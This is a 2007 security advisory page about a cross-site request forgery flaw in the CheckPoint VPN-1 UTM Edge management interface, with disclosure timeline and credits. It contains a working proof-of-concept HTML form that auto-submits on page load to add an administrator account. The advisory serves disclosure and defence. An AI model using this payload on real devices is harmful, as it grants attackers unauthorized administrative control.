SecuriTeam™ - CheckPoint VPN-1 UTM Edge Cross Site Request Forgery Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam™
Beyond Security®

SecuriTeam™ Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam™ in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

VPN-1 UTM Edge appliances deliver "unified threat management to enterprises with branch offices and simplify security deployments and manageability."

During an audit of VPN-1 UTM Edge it was discovered that a cross site request forgery vulnerability exists in the management interface. Thus, it is possible for an attacker to perform any administrative actions in the management interface. These include e.g. adding additional admin users.

Credit:
The information has been provided by Henri Lindberg, Associate of (ISC) or Jussi Vuokko, CISSP.
The original article can be found at: http://www.louhi.fi/advisory/checkpoint_070626.txt

Audit your web server for security holes - see what the hackers see.
Sign up for a scan today - risk free!

Checkpoint VPN-1 Edge Embedded device management interface does not validate the origin of an HTTP request. If attacker is able to make user visit a hostile web page, a VPN-1 Edge device can be controlled by submitting suitable forms. It is possible to add new users for example.

Successful attack requires that the attacker knows the management interface address for the target device. As the management interface does not have logout functionality, user can be vulnerable to this attack even after closing a tab containing the management interface (if user does not close the browser window or clear cookies and depending on browser behaviour).

Proof of Concept:
Example form (adds new read-only administrator):

<html>
<body onload="document.CSRF.submit()">
<form name="CSRF" method="post"
action="https://fw.example.com/pop/WizU.html "style="display:none">

<input name="swstate" value="WizU1">
<input name="swtosave" value="1">
<input name="swback" value="0">
<input name="swindex" value="-1">
<input name="swuuser" value="evil-user">
<input name="swupass" value="password">
<input name="swuexp" value="0">
<input name="swuday" value="4">
<input name="swumonth" value="5">
<input name="swuyear" value="2008">
<input name="swuhour" value="03">
<input name="swumin" value="11">
<input name="swuampm" value="1">
<input name="swuacc" value="1">
<input name="swuvpn" value="0">
<input name="swuufp" value="0">
<input name="swuhot" value="0">
<input name="tacc" value="1">

</form>
</body>
</html>

Disclosure Timeline:
7. June 2007 - Contacted Checkpoint by email
26. June 2007 - Vendor released an updated version
26. June 2007 - Advisory was released

Subject:		Date:
From:

	Cisco BBSM Captive Portal Cross-site Scripting
	Cisco Unified Communications Manager Denial of Service Vulnerabilities
	Novell eDirectory Unauthenticated Access to SOAP Interface
	Call of Duty Denial of Service
	Wonderware SuiteLink Denial of Service Vulnerability
	WebMod Multiple Vulnerabilities
	IAX2 Incomplete 3-Way Handshake (Spoofing)
	Multiple Vendor OpenOffice Vulnerabilities
	Apple Safari WebKit PCRE Handling Integer Overflow Vulnerability
	Cisco Network Admission Control Shared Secret Vulnerability
	ClamAV libclamav PeSpin Heap Overflow Vulnerability
	ClamAV libclamav PE WWPack Heap Overflow Vulnerability
	IBM Informix Pre-Authentication Stack Overflow
	Adobe Flash Player DeclareFunction2 Invalid Object Use Vulnerability
	HP OpenView NNM Buffer Overflow